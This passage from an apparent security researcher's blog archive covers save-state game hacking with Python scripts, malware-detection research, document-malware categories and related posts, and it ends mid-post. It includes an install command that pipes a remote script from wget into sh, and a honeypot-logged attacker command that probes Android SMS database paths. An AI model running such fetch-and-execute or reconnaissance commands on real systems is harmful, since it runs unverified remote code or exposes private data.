The simplest reverse engineering technique for finding a data variable of interest is differential analysis. Remember that our goal is to modify the health of the final boss for an easy victory. It's reasonable to assume that somewhere in the program's memory, there's an integer that keeps track of the current health. Also, since the game is actively running, this variable shouldn't be relocated in memory too often. The question is: how do we find it?

We'll use differential analysis. Specifically, we'll save the game's state, inflict some damage on the boss, save the new state, inflict more damage, save and so forth. Since this game shows the HP value and the damage of our attacks, we should know the exact health of the boss at each state we save. All we need to do then is compare the memory of the states and find a location that contains the correct health value across all the states.
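
Before touching real data, here is the idea in miniature. This is a toy sketch on made-up four-byte "memories", assuming the value fits in one byte and stays at the same offset; the function name is mine, and the real script used later in this guide works on the decompressed save states.

```python
def find_candidates(snapshots, expected):
    """Return offsets whose byte equals the expected value in every snapshot."""
    views = [bytearray(s) for s in snapshots]   # uniform integer indexing
    length = min(len(v) for v in views)
    return [off for off in range(length)
            if all(v[off] == want for v, want in zip(views, expected))]

# Three made-up snapshots; the "health" byte drops from 50 to 40 to 25
snap_a = bytes(bytearray([7, 50, 0, 50]))
snap_b = bytes(bytearray([7, 40, 1, 50]))
snap_c = bytes(bytearray([7, 25, 2, 40]))

print(find_candidates([snap_a, snap_b, snap_c], [50, 40, 25]))
```

Offset 3 also holds 50 in the first snapshot, but it fails the second comparison. Each extra snapshot prunes coincidental matches like that one, which is why a single save state is not enough.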

Creating Save States

So let's begin. It's time to confront the big bad dragon at the end of Fire Emblem 7:

This overgrown lizard is quite the challenge if you approach him underleveled and without enough good equipment, but rather than working harder by reloading a past save and redoing half the chapters, we're going to work smarter and show the boss who the real master of this game universe is!

At our first save state, he's at full health. Unfortunately, this game is cheeky and hides his HP at the start of the fight:

This won't be a problem though because the game shows exactly how much damage we inflict:

In this case, Eliwood's sword will inflict 21 damage. He's seriously underpowered, but can still survive the attack:

At this point, we make our second save state and note that we've inflicted 21 damage so far. As Athos prepares to cast magic on the foul beast, we can now see the HP of the boss:

He had 99 HP when the second save was made, meaning he started with 120. Now Athos inflicts another 20 damage:

And we make a third save state. The HP of the boss at this save is 79:

Three states should be enough for our analysis, so it's time to transfer the data over to a computer and get hacking.

The Analysis

As I mentioned earlier, this is a differential analysis. We're looking for a memory location storing a variable that's 120 in the first state, 99 in the second and 79 in the third. In base 16, this is 0x78, 0x63 and 0x4f. Luckily, all these values are small enough to be encoded as a single byte, so we can scan the game's memory linearly without having to consider factors like alignment or endianness. So let's get to work.

To speed up this analysis, I wrote a script in Python. This code is compatible with Python 2 and 3 and the comments are self-explanatory:

:::python
#!/usr/bin/env python
from __future__ import print_function
import gzip
from struct import unpack
import sys

def decode_gzip(filepath):
    # Python 2 and 3 decode byte I/O differently, this method ensures consistency
    with gzip.open(filepath, 'rb') as fd:
        if sys.version_info.major <= 2:
            return [unpack('B', byte)[0] for byte in fd.read()]
        else:
            return fd.read()

# the names for my save state data files
files = ['Fire Emblem (U).jg1',
         'Fire Emblem (U).jg2',
         'Fire Emblem (U).jg3']

# the expected HP value in each save state
hps = [120, 99, 79]

# decompress the save states
data = [decode_gzip(file) for file in files]

# for each save state, find all the offsets that contain the expected HP value
# this is not the most efficient way of doing intersection search, but it's easier
# to read and efficient enough for our amount of data
match_sets = list()
for state, hp in zip(data, hps):
    matches = [offset for offset, byte in enumerate(state) if byte == hp]
    match_sets.append(set(matches))

# we want the intersecting offsets across save states
intersection = match_sets[0].intersection(*match_sets[1:])

# sort and print the results
offsets = [hex(offset) for offset in sorted(intersection)]
print(', '.join(offsets))

Running the search on my states yields three candidate locations:

$ python search.py
0x29222, 0x354b2, 0x91df3

It's common to get more than one candidate because depending on the game's logic, values like health might be maintained in multiple locations for different purposes (e.g. for rendering it as text on the screen, detecting certain state triggers, etc.). As long as the number of results is few, it's usually safe to just overwrite all of them. If the game crashes, we can always go back and make modifications more conservatively.

Modifying a Save State

Now that we know where to make our modifications, let's set the health of the boss to 1 HP! Here's another Python script to do just that:

:::python
#!/usr/bin/env python
from __future__ import print_function
import gzip
from struct import unpack
import sys

def decode_gzip(filepath):
    # Python 2 and 3 decode byte I/O differently, this method ensures consistency
    with gzip.open(filepath, 'rb') as fd:
        if sys.version_info.major <= 2:
            return bytearray([unpack('B', byte)[0] for byte in fd.read()])
        else:
            return bytearray(fd.read())

if len(sys.argv) < 4:
    print("Usage:", sys.argv[0], "<state_file.jg> <patch_value> <offset> [<offset> ...]")
    sys.exit(1)

# parse the command line arguments
state_file = sys.argv[1]
patch_value = int(sys.argv[2], 16)
offsets = [int(value, 16) for value in sys.argv[3:]]

# read in the save state data
data = decode_gzip(state_file)

# overwrite the designated bytes
for offset in offsets:
    data[offset] = patch_value

# write the new save state
with gzip.open(state_file + '.patched', 'wb') as fd:
    fd.write(bytes(data))

Now we just apply the patch:

$ python patch.py Fire\ Emblem\ \(U\).jg1 0x01 0x29222 0x354b2 0x91df3

Which will create a new save state with the filename of the original plus the suffix .patched. All that's left is to replace the original save state in John GBA with our patched version and then we're ready to slay a dragon with ease.
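Before loading the patched state into the emulator, it can be worth confirming that only the intended bytes changed. The following is a minimal sketch of such a check, not part of the original scripts; the function name changed_offsets is hypothetical and it assumes both files are gzip-compressed save states of the same size:

```python
import gzip

def changed_offsets(original_path, patched_path):
    """Return the offsets at which two gzip-compressed save states differ."""
    with gzip.open(original_path, 'rb') as fd:
        original = bytearray(fd.read())
    with gzip.open(patched_path, 'rb') as fd:
        patched = bytearray(fd.read())
    # a patch that only overwrites bytes should never change the length
    if len(original) != len(patched):
        raise ValueError('save states differ in size')
    # bytearray yields integers in both Python 2 and 3
    return [offset
            for offset, (old, new) in enumerate(zip(original, patched))
            if old != new]
```

Calling changed_offsets on the original file and its .patched counterpart should list exactly the three offsets we overwrote, since each of them held 120 in the first save state.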

The Result

Not so tough now, are we dragon?

And down it goes in one hit. How embarrassing:

Conclusion

So that's the most basic approach to hacking a video game save state. I hope you've found this guide entertaining and informative. I'd like to reemphasize that this only scratches the surface of the broad area that is reverse engineering. The beauty of differential analysis is we didn't have to know any low-level details about how the Game Boy Advance hardware behaves or the game's logic. This makes differential analysis one of the most transferable techniques. That said, it also has limited applicability. For example, if the game developers wanted to prevent tampering, even the most basic obfuscation (e.g. doubling every integer before storing it in memory) would thwart our analysis. There are also fun hacks that cannot be implemented via a one-time memory patch (e.g. giving your character invincibility). So if you find this topic interesting, I recommend checking out other tutorials floating around on the internet.
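To make the obfuscation limitation concrete, here is a toy sketch. The 8-byte "memories" and the doubling scheme are hypothetical stand-ins for illustration, not data from the actual game:

```python
def find_byte(memory, value):
    """Return every offset in memory whose byte equals value."""
    return {offset for offset, byte in enumerate(bytearray(memory)) if byte == value}

def candidates(states, values):
    """Intersect the matching offsets across all save states."""
    sets = [find_byte(state, value) for state, value in zip(states, values)]
    return sorted(sets[0].intersection(*sets[1:]))

# the HP values we observed on screen
hps = [120, 99, 79]

# hypothetical memories where offset 3 stores the HP as-is
plain = [bytearray([0, 7, 0, hp, 0, 0, 9, 0]) for hp in hps]

# the same memories if the game doubled the HP before storing it
doubled = [bytearray([0, 7, 0, hp * 2, 0, 0, 9, 0]) for hp in hps]

print(candidates(plain, hps))                       # [3]
print(candidates(doubled, hps))                     # []
print(candidates(doubled, [hp * 2 for hp in hps]))  # [3]
```

The search only succeeds on the doubled memory once we already know the transformation, which is exactly the low-level knowledge differential analysis let us avoid.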

Thanks for reading and happy hacking.

MLsploit Extended Abstract to Appear in KDD 2019

2019-06-11T09:30:00-04:00

My coauthors and I will be presenting an extended abstract in the 25th Conference on Knowledge Discovery and Data Mining (KDD'19) in August. Below is a preview:

Title: MLsploit: A Framework for Interactive Experimentation with Adversarial Machine Learning Research

Authors: Nilaksh Das, Siwei Li, Chanil Jeon, Jinho Jung, Shang-Tse Chen, Carter Yagemann, Evan Downing, Haekyu Park, Evan Yang, Li Chen, Michael Kounavis, Ravi Sahita, David Durham, Scott Buck, Polo Chau, Taesoo Kim, Wenke Lee

Abstract: We present MLsploit, the first user-friendly, cloud-based system that enables researchers and practitioners to rapidly evaluate and compare state-of-the-art adversarial attacks and defenses for machine learning (ML) models. As recent advances in adversarial ML have revealed that many ML techniques are highly vulnerable to adversarial attacks, MLsploit meets the urgent need for practical tools that facilitate interactive security testing of ML models. MLsploit is jointly developed by researchers at Georgia Tech and Intel, and is open-source. Designed for extensibility, MLsploit accelerates the study and development of secure ML systems for safety-critical applications. In this showcase demonstration, we highlight the versatility of MLsploit in performing fast-paced experimentation with adversarial ML research that spans a diverse set of modalities, such as bypassing Android and Linux malware, or attacking and defending deep learning models for image classification. We invite the audience to perform experiments interactively in real time by varying different parameters of the experiments or using their own samples, and finally compare and evaluate the effects of such changes on the performance of the ML models through an intuitive user interface, all without writing any code.

Barnum Paper to Appear in Information Security Conference 2019 (ISC'19)

2019-06-08T15:30:00-04:00

My coauthors and I will be presenting a paper in the 22nd Information Security Conference (ISC'19) in September. Below is a preview:

Project Page

Title: Barnum: Detecting Document Malware via Control Flow Anomalies in Hardware Traces.

Authors: Carter Yagemann (Georgia Tech), Salmin Sultana (Intel Labs), Li Chen (Intel Labs), Wenke Lee (Georgia Tech).

Abstract: This paper proposes Barnum, an offline control flow attack detection system that applies deep learning on hardware execution traces to model a program's behavior and detect control flow anomalies. Our implementation analyzes document readers to detect exploits and ABI abuse. Recent work has proposed using deep learning based control flow classification to build more robust and scalable detection systems. These proposals, however, were not evaluated against different kinds of control flow attacks, programs, and adversarial perturbations.

We investigate anomaly detection approaches to improve the security coverage and scalability of control flow attack detection. Barnum is an end-to-end system consisting of three major components: 1) trace collection, 2) behavior modeling, and 3) anomaly detection via binary classification. It utilizes Intel® Processor Trace for low overhead execution tracing and applies deep learning on the basic block sequences reconstructed from the trace to train a normal program behavior model. Based on the path prediction accuracy of the model, Barnum then determines a decision boundary to classify benign vs. malicious executions.

We evaluate against 8 families of attacks to Adobe Acrobat Reader and 9 to Microsoft Word on Windows 7. Both readers are complex programs with over 50 dynamically linked libraries, just-in-time compiled code and frequent network I/O. Barnum shows its effectiveness with 0% false positive and 2.4% false negative on a dataset of 1,250 benign and 1,639 malicious PDFs. Barnum is robust against evasion techniques as it successfully detects 500 adversarially perturbed PDFs.

Extended Abstract to Appear in CVPR-19 Workshop on Explainable AI

2019-04-26T17:00:00-04:00

My coauthors and I will be presenting an extended abstract in the workshop on Explainable AI at CVPR 2019 in June. Below is a preview:

Title: To believe or not to believe: Validating explanation fidelity for dynamic malware analysis.

Authors: Li Chen (Intel Labs), Carter Yagemann (Georgia Tech), Evan Downing (Georgia Tech).

Abstract: Converting malware into images followed by vision-based deep learning algorithms has shown superior threat detection efficacy compared with classical machine learning algorithms. When malware are visualized as images, visual-based interpretation schemes can also be applied to extract insights of why individual samples are classified as malicious. In this work, via two case studies of dynamic malware classification, we extend the local interpretable model-agnostic explanation algorithm to explain image-based dynamic malware classification and examine the interpretation fidelity. For both case studies, we first train deep learning models via transfer learning on malware images, demonstrate high classification effectiveness, apply an explanation method on the images, and correlate the results back to the samples to validate whether the algorithmic insights are consistent with security domain expertise. In our first case study, the interpretation framework identifies indirect calls that uniquely characterize the underlying exploit behavior of a malware family. In our second case study, the interpretation framework extracts insightful information such as cryptography-related APIs when applied on images created from API existence, but generate ambiguous interpretation on images created from API sequences and frequencies. Our findings indicate that current image-based interpretation techniques are promising for vision-based malware classification. We continue to develop image-based interpretation schemes specifically for security applications.

H&R Block App Analytics for 2019

2019-04-12T13:00:00-04:00

Last year I wrote a blog post about using the analytics publicly released by the USA government to glean some information about H&R Block's mobile apps. If you haven't read it, I recommend doing so because in this post I'm going to give an update for the 2019 tax year.

I haven't changed the code or data source, so check the original blog post for those. As I previously mentioned, I've been collecting this data since 2016 and I'm happy to share it upon request.

Results

Here are the results for 2019, in no particular order:

From January 13 through April 11, 497 requests were made by MyBlock and 334,960 by Taxes.
322,749 requests were made from phones while 12,708 were made from tablets; about 96% of the requests came from phones.
100% of requests were made by devices running iOS.
Three versions of MyBlock appear in the dataset: 6.6.0, 6.8.0, and 7.0.1.
Seven versions of Taxes appear in the dataset: 7.7.1, 7.8.0, 8.1.0, 8.2.0, 8.3.0, 8.5.0, and 8.6.0.
100% of requests contain "Mozilla" in the user-agent.

And the security question from the original blog post:

197,548 requests used TouchID, 88,094 FaceID, and 49,815 showed neither keyword; 59%, 26%, and 15%, respectively.
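For anyone who wants to check the arithmetic, here is a short sketch that recomputes the shares from the counts reported above. The variable names are my own for this illustration and are not taken from the original analysis code:

```python
# request counts reported above for January 13 through April 11, 2019
by_app = {'MyBlock': 497, 'Taxes': 334960}
by_device = {'phone': 322749, 'tablet': 12708}
by_auth = {'TouchID': 197548, 'FaceID': 88094, 'neither': 49815}

total = sum(by_app.values())

# every breakdown should account for the same number of requests
assert sum(by_device.values()) == total
assert sum(by_auth.values()) == total

def shares(counts):
    """Convert raw counts into percentages rounded to the nearest integer."""
    return {name: int(round(100.0 * count / total)) for name, count in counts.items()}

print(total)              # 335457
print(shares(by_device))  # phone: 96, tablet: 4
print(shares(by_auth))    # TouchID: 59, FaceID: 26, neither: 15
```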

Comparison to 2018

Whereas in 2018 the vast majority of requests were made by MyBlock, in 2019 almost all requests were made by Taxes.
No requests by Android devices appear in 2019.
The change in usage of TouchID, FaceID, and neither is -15%, 19%, and -4%, respectively.

Discussion

It's interesting that no requests were made from Android devices in 2019. The MyBlock app is listed on the Play store, so why don't they appear in the data? One possibility is they no longer use a special user agent. Another is they no longer communicate with a USA government website contained in the public analytic data. It's hard to know for certain what the root cause is.

We can also see that the usage of FaceID is rising at a cost to both of the other categories. This implies conversions came from both existing TouchID users and new adopters. The shift makes sense as more FaceID compatible phones reach customer hands. It'll be interesting to see if this trend continues in 2020 or if the adoption of Apple's biometric features reaches premature saturation.

Android Intent Firewall Documentation

2019-04-06T10:00:00-04:00

A while ago I was notified that the documentation on Android's Intent Firewall that I wrote while I was a student at Syracuse University is no longer available. Surprisingly, despite how old the document is, I still get requests for it. Thus, I've taken the time to make a copy of it on this website for preservation. You can access it here.

Malware Has a Color

2019-02-21T21:00:00-05:00

In an upcoming paper I plan to present some preliminary work in applying machine learning to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate how to use this to analyze document malware with promising accuracy. In previous posts, I've detailed the threat malicious documents pose to users and shared some insights into why this problem remains prevalent. For this post, I want to switch gears and share a fun technique I use to help understand what the control flow anomaly detector is really seeing. Put playfully, I'm going to demonstrate how to spot malware by the color it makes. Enjoy.

Without going into too many details about the system (I'll be sure to make a post about where to find the paper and code when it becomes available), at a high level we collect and use execution traces of a target program (e.g. Acrobat Reader) opening benign documents to create a path prediction model. We then use the model on an unlabeled trace with the intuition being that any occurring anomalies will cause a sudden drop in prediction accuracy. There's a little more to it than that, but this is the gist of how the system operates.

One challenge with such a system is the traces are massive. Even if we narrow our focus to only indirect control flow transfers (e.g. ret, icall, and ijmp), that's still thousands to millions of events per minute of real-time execution. This makes it a challenge to diagnose whether there was a bug or whether the malware simply didn't detonate.

One option is to manually analyze the malware sample, typically by running the virtual machine in another framework. This is time consuming though, which is why I've come up with a niftier solution that involves visualizing the trace in conjunction with the model's output. This is how I discovered that malware has a color.

Visualization Technique

First, I convert each target address into a color by hashing it. For simplicity, I take the first three bytes of an MD5 hash to get an RGB tuple. The reason I use a cryptographic hashing algorithm instead of a simple checksum is so nearby addresses will create very different colors, creating contrast. Here's an example of what a benign trace looks like:

We can clearly see patterns, but there's no clear indicator of what makes one normal and another anomalous. Let's compare with a family of PDF malware that the system is good at detecting: pdfka. Here's one of the traces:

Look at that streak of dark blue! What's going on there? Is this an exploit or simply a pattern our previous example didn't capture? To find out, I create a second image where each target is a white pixel if the model predicted it correctly and black if the prediction was wrong. Here's the result for the same trace:

Looks like there's a streak of incorrect predictions that lines up with the dark blue, but let's confirm it by subtracting the two images. This will cause areas of accurate prediction (white in the second image) to become black while areas of incorrect predictions will keep their color from the first image. Here's the result:

Sure enough, that blue streak is an anomaly produced by pdfka. In fact, if we were to visualize all the pdfka samples in our paper's evaluation dataset, we would find they all contain a blue streak. What the blue is really visualizing is an exploit (CVE-2010-0188) being carried out against the TIFF parser library in AcroRd32.dll. Therefore, we can say the color of pdfka is dark blue!
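The steps in this section can be sketched in a few lines of Python. This is a simplified illustration rather than the code used for the paper: how an address is serialized before hashing (here, its hex string) is an assumption, and the sample addresses and prediction results are made up:

```python
import hashlib

def address_color(address):
    """Map a target address to an RGB tuple using the first three bytes of its MD5 hash."""
    # assumption: the address is hashed as its hexadecimal string
    digest = hashlib.md5(hex(address).encode('ascii')).digest()
    return tuple(bytearray(digest[:3]))

def subtract(trace_colors, predictions):
    """Subtract the prediction image from the trace image, pixel by pixel.

    Correct predictions are white pixels (255), so subtracting them clamps the
    color to black. Wrong predictions are black pixels (0), so the trace color
    is kept as-is.
    """
    result = []
    for color, correct in zip(trace_colors, predictions):
        mask = 255 if correct else 0
        result.append(tuple(max(channel - mask, 0) for channel in color))
    return result

# hypothetical trace of indirect control flow targets
trace = [0x401000, 0x401004, 0x7ff01230, 0x7ff01234]
# hypothetical model output: True where the target was predicted correctly
predictions = [True, True, False, False]

colors = [address_color(address) for address in trace]
for pixel in subtract(colors, predictions):
    print(pixel)
```

In the output, the first two pixels are black and the last two keep their original colors, which is how a run of mispredicted targets shows up as a colored streak.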

Other Examples

To demonstrate the value of subtracting, consider this visualization of opening a Microsoft Word document:

You may be tempted to conclude this is a red malware (since coming up with this technique, I've been referring to malware by their colors instead of family names for fun), but it's actually benign. We can see this in the subtraction:

No colors means no anomalies. Now let's see a trace of hancitor:

As you can see, it's green malware. Meanwhile thus is blue-purple:

I think that's enough examples to make my point. I hope you've been convinced that malware has a color. Thanks for reading and happy hacking!

Upcoming MLsploit Demo at Black Hat Asia 2019

2019-01-17T17:00:00-05:00

A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019. You can read more about it here.

Three Kinds of Document Malware and Designing Frameworks to Detect Them

2018-12-27T12:00:00-05:00

Lately I've been spending a lot of time with document malware and exploring techniques for detection. Malicious documents pose interesting challenges and have become the typical first vector for adversaries to achieve a foothold. Despite this, document malware seems largely overlooked by academics compared to their executable counterparts. In short, it's an area worth exploring.

As I compared the current detection techniques, I noticed the pros and cons are nuanced. Static analysis is quick and accurate, but very vulnerable to evasion via adversarial perturbation. Dynamic analysis is slower and error prone because samples can fail to trigger, but produces richer data. These characteristics are further amplified by the use of machine learning. Adding junk bytes between the elements of a PDF can evade a static feature learner in seconds. Unfortunately, dynamic features don't fare much better.

In time I've begun to formulate a theory that there are currently three kinds of document malware. By applying this insight, I find I can substantially influence the results of my experiments. While not as conclusive as something like a double dissociation, I want to share what I've observed in hopes that it'll inspire others when designing their detection systems and provoke feedback.

So without further ado, here's my theory. Currently, there are three kinds of document malware: exploit-based, abuse-based, and phishing-based. While I propose categories, note that they are not mutually exclusive. Malware authors can always chain and blend techniques to achieve their goals. Therefore, these categories should be seen as points on a spectrum. That said, complexity invites failure, so I do not expect real world authors to stray far from these focal points. The following paragraphs elaborate on each category in reverse order.

Phishing-based

This is the trickiest category for a computer scientist because humans are complicated and confusing entities. The exemplar of this category is a document that tries to convince the user to take some compromising action. There may be a link to a fake website or steps that lead to disabling a security feature. Admittedly, this is a category I currently steer clear of. The best solutions are better education, stronger policies, and a clear strategy for recovery when a human mistake is inevitably made. Also note that this category is the most likely to be chained with others. For example, a document may need to lure the victim into clicking a button before a payload can be used. In rare cases, user interaction may even be leveraged to thwart automated analysis. Thankfully, I have yet to see a malware author embed a CAPTCHA in their document.

Abuse-based

This category does not consider the human user, but distinguishes itself in how it uses the target application. The exemplar here is a PDF containing JavaScript or a Word document with macros that uses provided APIs to download and execute additional malware. The key point to emphasize here is these documents do not violate the specification of the application. The program is functioning as intended. This is why I label these instances as abuse rather than exploitation. This distinction is critical to consider when designing a detection framework. On the one hand, they're tricky because they blend in with benign behavior. This is why, for example, looking at system call sequences is a bad idea for this category. On the other hand, since the program's integrity isn't compromised, it's safe to make strong assumptions in these situations. This is where static analysis is best suited. Designed correctly, such frameworks can leverage strong models of the target program to accurately and statically detect abuse. This saves resources and minimizes exposure to noise.

Exploit-based

Which brings us to the last category. Here's where we see the stuff 0-days and CVEs are made from. It's also where all corners of the security community like to flaunt their technical know-how with intricate ROP chains and compact shellcode. Jargon aside, this category differs from abuse-based in that it does violate the program's specification. Memory corruption, underflows, overflows, and more are all fair game for achieving arbitrary code execution. This means the author's attacks can take unusual forms, like malformed images, and detection frameworks have to cope. For this reason, this is where dynamic analysis overtakes static. Because exploits by definition break models and assumptions, the only way towards proactive detection is to actually trigger them.

I hope readers find this categorization useful. Note that this is not the only way document malware can be divided. For example, payloads can execute inside the target application or in a separate process, creating a spectrum of intrinsic versus extrinsic behaviors. Regardless, my three category theory has helped me design novel systems and interpret the evaluation results, so I wanted to share it.

Thanks for reading.

Mention for Georgia Tech Vulnerability Disclosure

2018-09-05T22:15:00-04:00

Georgia Tech has acknowledged me for a past vulnerability I disclosed to them.

The Unfortunate Economics of Defense in Depth

2018-08-14T23:30:00-04:00

A mantra we hear all the time in security is the notion of defense in depth. It's applied in numerous areas from protecting computer systems to safeguarding airports. Anyone who receives formal training in security will likely encounter the term at least once in their coursework. It's a milestone we are told to strive for when designing secure systems.

For readers who are unfamiliar with the term, it's the idea that when designing security into a system, we should place several overlapping layers of defense wherever possible. The insight behind this idea is that thwarting an attack only requires one layer of defense to succeed whereas the attacker's success depends on penetrating every layer. Consider, for example, an invading army storming a castle. In order for the invasion to succeed, the invaders must survive raining arrows from archers, traverse a moat, breach the castle walls, and kill the soldiers inside. Failure to surmount any one of these defenses spells disaster for the attack. Worse yet for the invading army, as long as each layer's chance of successfully halting the attack is independent from the other layers, adding more layers makes the attacker's task more likely to fail. On the other hand, this is great news if you are the one assigned to defend the castle.

Unfortunately, step outside the classroom and it will not take long to run into the counterforce that stifles an otherwise brilliant concept. The force I am referring to is economics. Defenses don't come for free and as I plan to highlight in this blog post, there is a fundamental problem with applying defense in depth once economics enters the equation.

To aid my explanation, let's use fair coin flips as a simple running example. Although coins are a far cry from airports or castles, the underlying probabilities behind flipping a coin are simple to understand and also sufficient to make my point.

As you are probably already aware, a fair coin flip yields one of two possible outcomes, heads or tails, with equal and mutually exclusive probabilities. The probability of getting heads once is 50%. Getting heads twice in a row is 25%. Three times is 12.5%. This probability p is expressed by the following formula for x coin flips:

p = (1/2)^x

If we graph this function for a couple of flips, we get the following figure:

As we can see, the relationship between the number of flips and the probability is exponential. Adding a few additional flips significantly impacts the probability of getting all heads at first, but as even more flips are added, eventually the effect diminishes. In other words, the difference in chance of getting two heads versus three is substantial, but the difference between 999 and 1,000 heads is comparatively minuscule. Tying this analogy back to security, if we map the outcome of heads to the attacker successfully breaching a layer of security, we can see how overlapping a few defensive layers can offer significantly better security and reduce the attacker's chance of success. However, with each additional layer, the defender's gain diminishes. Regardless, this outcome shows that defense in depth is fundamentally valuable and we can safely apply it in the real world as long as the effectiveness of each layer being evaluated is completely (or at least nearly) independent of the others.

Unfortunately, as I alluded to in the introduction, every layer of defense has a cost to design, implement, deploy, and maintain. If these costs are also completely (or at least nearly) independent, a problem arises. Namely, each additional layer raises the cost of the overall defense linearly, but the return yielded in security diminishes exponentially. Returning to our running example, now consider the case where each flip costs one unit of resource to perform. If we add this function to our previous graph, we get the following figure:

And if we reformat this graph to show the proportional gain in cost to the gain in security, we get:

Put plainly, the cost of using defense in depth to achieve decent security is relatively cheap, but achieving exceptional security is extremely expensive. This is bad news for the defender and a fundamental limitation to the idea of defense in depth.
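The numbers behind this argument are easy to reproduce. The sketch below follows the running example (each layer is a fair coin flip that costs one unit); the function names are hypothetical, and dividing the marginal cost by the marginal security gain is just one way to express the ratio discussed above:

```python
def breach_probability(layers):
    """Chance the attacker gets heads on every one of `layers` independent fair flips."""
    return 0.5 ** layers

def security_gain(layers):
    """Drop in breach probability from adding the final layer."""
    return breach_probability(layers - 1) - breach_probability(layers)

def cost_per_unit_gain(layers, cost_per_layer=1.0):
    """Cost of the final layer divided by the security it buys."""
    return cost_per_layer / security_gain(layers)

for layers in range(1, 11):
    print(layers,                       # cumulative cost in units
          breach_probability(layers),   # attacker's chance of success
          security_gain(layers),        # what this layer added
          cost_per_unit_gain(layers))   # price of that improvement
```

The total cost grows by one unit per layer while the price of each improvement doubles: the third layer costs 8 units per unit of security gained, and the tenth costs 1,024.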

Hopefully you now understand the title of this blog post and realize why this relationship is important to grasp. For example, understanding this topic helps explain the controversies and debates surrounding the cost of funding the Transportation Security Administration's twenty "Layers of Security" framework:

I'll forgo an in-depth analysis of this chart since other researchers have already examined it in great detail, but to summarize, if you pick a relevant threat to airport security and consider each layer's effect on stopping it, you'll realize removing any one layer has seemingly little impact on the overall risk of failure. This raises the question of whether there are layers that can be removed to significantly reduce cost without significantly reducing security. Certainly an idea worth exploring, if the science can be separated from the politics. Until then, I hope you've found this blog post interesting and insightful.

Paper Accepted to ACM CCS 2018

2018-07-23T22:00:00-04:00

A paper I co-authored has been accepted to the 25th ACM Conference on Computer and Communications Security (CCS'18) being held in Toronto, Canada from October 15, 2018 to October 19, 2018.

Title: Enforcing Unique Code Target Property for Control-Flow Integrity

Authors: Hong Hu, Chenxiong Qian, Carter Yagemann, Simon Pak Ho Chung, Bill Harris, Taesoo Kim, Wenke Lee

Abstract:

The goal of control-flow integrity (CFI) is to stop control-hijacking attacks by ensuring that each indirect control-flow transfer (ICT) jumps to its legitimate target. However, existing implementations of CFI have fallen short of this goal because their approaches are inaccurate and as a result, the set of allowable targets for an ICT instruction is too large, making illegal jumps possible.

In this paper, we propose the Unique Code Target (UCT) property for CFI. Namely, for each invocation of an ICT instruction, there should be one and only one valid target. We develop a prototype called uCFI to enforce this new property. During compilation, uCFI identifies the sensitive instructions that influence ICT and instruments the program to record necessary execution context. At runtime, uCFI monitors the program execution in a different process, and performs points-to analysis by interpreting sensitive instructions using the recorded execution context in a memory safe manner. It checks runtime ICT targets against the analysis results to detect CFI violations. We apply uCFI to SPEC benchmarks and 2 servers (nginx and vsftpd) to evaluate its efficacy of enforcing UCT and its overhead. We also test uCFI against control-hijacking attacks, including 5 real-world exploits, 1 proof of concept COOP attack, and 2 synthesized attacks that bypass existing defenses. The results show that uCFI strictly enforces the UCT property for protected programs, successfully detects all attacks, and introduces less than 10% performance overhead.

Weird Things Are Afoot In The Honeypot

2018-05-30T11:00:00-04:00

Here's something you don't see every day. The logs from my SSH honeypot show someone brute-forcing the password for root and then executing:

ls /data/data/com.android.providers.telephony/databases

This is a strange directory to look for because it's where Android devices store the SQLite databases for SMS messages and contacts. Why would an attacker expect an SSH server on the internet to be an Android device? Are there IoT devices based on Android that run SSH servers and also store contacts? If someone knows, please tell me!

EFF and EFAIL: An Example of Hype Culture Gone Awry

2018-05-14T21:30:00-04:00

I usually try to keep my blog posts technical and free of politics, but I can't hide my frustration over EFF's response to today's release of the EFAIL vulnerability.

If you haven't heard by now, EFAIL is the name of a vulnerability having to do with how email clients like Thunderbird handle PGP encrypted emails. This vulnerability allows a strong adversary to decrypt emails provided that they possess previously encrypted messages from a victim, can tamper with emails in transit, and the victim's client is configured to automatically fetch remote content.

I emphasize the word strong because any security researcher can see that these preconditions mean this attack is only a concern to individuals being targeted by nation-states. As many Slashdot users and companies like ProtonMail have pointed out, this vulnerability is over-hyped, blown out of proportion, and the course of action being loudly proposed is somewhere between draconian and moronic.

Unfortunately, it seems EFF is at the forefront of this crusade to misguide users. Within hours of the details being released, EFF published a blog post advising everyone to immediately stop using PGP. Since then, less than 24 hours later, EFF has published over 13 articles driving home the "crisis" and providing step-by-step tutorials on how to "take action" by disabling PGP and decrypting emails. It is impressive that EFF has managed to write so much about EFAIL in so little time.

As a security researcher, allow me to share a piece of wisdom echoed by many of my peers. The appropriate reaction to a vulnerability that can potentially decrypt emails is not to start sending messages in plaintext. Sane people don't erase their operating system because of a bug, disable their firewall because of a glitch, or stop using encryption because of a flawed implementation. Decide how big of a risk EFAIL is to you, come up with a plan for remediation based on that risk, and apply software patches when they become available. For most users, this boils down to simply continuing your good security habits. Disabling security in response to a bug is insanity.

Shame on EFF for over-hyping vulnerabilities and giving terrible security advice!

Debian Apt Repo for libipt

2018-02-24T18:30:00-05:00

As part of my Ph.D. research, I play around with Intel Processor Trace a lot. As a result, I frequently use libipt, both as a library for my own software and for the reference programs it includes. ptdump and ptxed are my go-to utilities for quickly checking and manipulating traces. They're super useful!

Sadly, on Debian and Ubuntu the default package repositories only have a package for the main library (no pre-compiled program binaries), and it is woefully out of date (last update was in 2016). Having to repeatedly compile xed and libipt from source quickly got annoying, so I've decided to publish my own repository. I've also made it public in hopes that others will find it useful.

The repository tracks the master branch on libipt and xed, so its packages should always contain the latest code. I've made adding it to apt super easy:

sh -c "$(wget -qO - https://super.gtisc.gatech.edu/libipt.sh)"

It currently has the following libraries:

libxed
libxed-dev
libipt (includes the sideband library)

And the following pre-compiled programs:

ptdump
pttc
ptxed

More information about these libraries and programs is available in their respective documentation. I hope to add more packages in the coming days.

For people interested in learning how to host their own repositories, I built this server using gocd, aptly, and apache.

H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT

2018-02-09T16:00:00-05:00

I like data mining. For better or worse, it's the gold of the digital age. So when the USA government decided to make the analytical data for their publicly facing websites available for download, I jumped at the opportunity. Thanks to this lovely data source, I can get insights into how popular various browsers and operating systems are, how frequently devices connect to USA government websites from foreign IP addresses, and more.

Sadly, the website only offers metrics for the past 30 days. Luckily, it's pretty easy to set up a Raspberry Pi or other small device to periodically fetch the freshest numbers and build a larger dataset. This is what I've been doing since August of 2016. If you're interested, send me an email and I'll be happy to share. After all, according to the government's website: "this website and its data are free for you to use without restriction."

Continuing my story, I was skimming over the most recent metrics when I noticed a funny browser user-agent:

